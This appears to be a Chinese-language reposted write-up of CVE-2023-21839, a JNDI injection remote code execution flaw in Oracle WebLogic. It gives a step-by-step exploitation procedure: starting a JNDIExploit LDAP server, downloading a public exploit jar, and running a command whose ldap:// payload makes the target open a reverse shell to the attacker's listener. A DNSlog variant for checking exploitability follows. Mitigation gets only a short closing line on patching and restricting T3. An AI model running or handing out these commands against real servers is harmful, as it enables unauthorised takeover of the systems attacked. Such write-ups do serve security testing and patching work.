Weblogic-CVE-2023-21839 漏洞解析

# 1. 漏洞概述 RCE漏洞，该漏洞允许未经身份验证的远程网络访问，并通过T3/IIOP协议损坏WebLogic服务器。成功利用该漏洞可导致Oracle WebLogic服务器被接管，并通过**rmi/ldap**远程协议执行远程命令。当**JDK版本过低**或者本地存在小工具（javaSerializedData）时，可能会导致远程代码执行。 可见，CVE-2023-21839是weblogic中的JNDI注入漏洞。 #2.影响范围 Oracle WebLogic 服务器12.2.1.3.0 Oracle WebLogic 服务器12.2.1.4.0 Oracle WebLogic 服务器14.1.1.0.0 # 3. 使用方法 ## 反弹壳 1、启用http://your-ip:7001/console即可看到登录界面 下载漏洞利用工具 **JNDIExploit-1.4-SNAPSHOT.jar** 2、启动ladp服务，同时在kali上启动监控： 使用JNDIExploit在vps上开启ldap协议服务。这里注意端口1389和3456是开放的。 ```` java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14 `` **漏洞EXP下载：** ```` https://github.com/DXask88MA/Weblogic-CVE-2023-21839 ```` 3.启动EXP（注意：jdk版本仍然需要是较低版本，原来的JDK17不需要卸载，只需下载较低版本的JDK并切换即可） ```` java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap: //192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999 java -jar 目标服务器IP地址:端口ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口 ```` 无明显变化 4、检查LDAP服务器，成功获取 ## DNSlog 流量要点 ```` eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip:7001 ldap://xxxxx

域名解析网

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap: //vqd5uu.dnslog.cn

``

也可以使用工具来实现。

# 4.漏洞防护下载最新补丁，链接：https://support.oracle.com/rs?type=docid=2917213.2 限制T3协议访问转载自freebuf：[https://www.freebuf.com/articles/web/386448.html](https://www.freebuf.com/articles/web/386448.html) 作者：锦鲤